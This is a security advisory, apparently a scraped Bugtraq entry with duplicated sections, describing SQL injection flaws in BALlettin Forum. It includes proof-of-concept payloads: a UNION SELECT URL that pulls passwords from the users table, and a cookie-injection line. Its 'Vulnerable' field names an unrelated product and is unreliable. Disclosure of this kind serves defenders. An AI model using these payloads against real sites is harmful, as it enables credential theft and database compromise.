BALlettin Forum Multiple SQL Injection Vulnerabilities
BID:41935
Info
BALlettin Forum Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 41935 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 25 2010 12:00AM |
| Updated: | Jul 25 2010 12:00AM |
| Credit: | 3v0 aka evolution |
| Vulnerable: |
ASP Indir AKY Blog 0 |
| Not Vulnerable: | |
Discussion
BALlettin Forum Multiple SQL Injection Vulnerabilities
BALlettin Forum is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BALlettin Forum is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
BALlettin Forum Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URI and data are available:
http://www.example.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1
javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";
Attackers can use a browser to exploit these issues.
The following example URI and data are available:
http://www.example.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1
javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";
Solution / Fix
BALlettin Forum Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
BALlettin Forum Multiple SQL Injection Vulnerabilities
References:
References:
- BALlettin Forum (BALlettin Forum)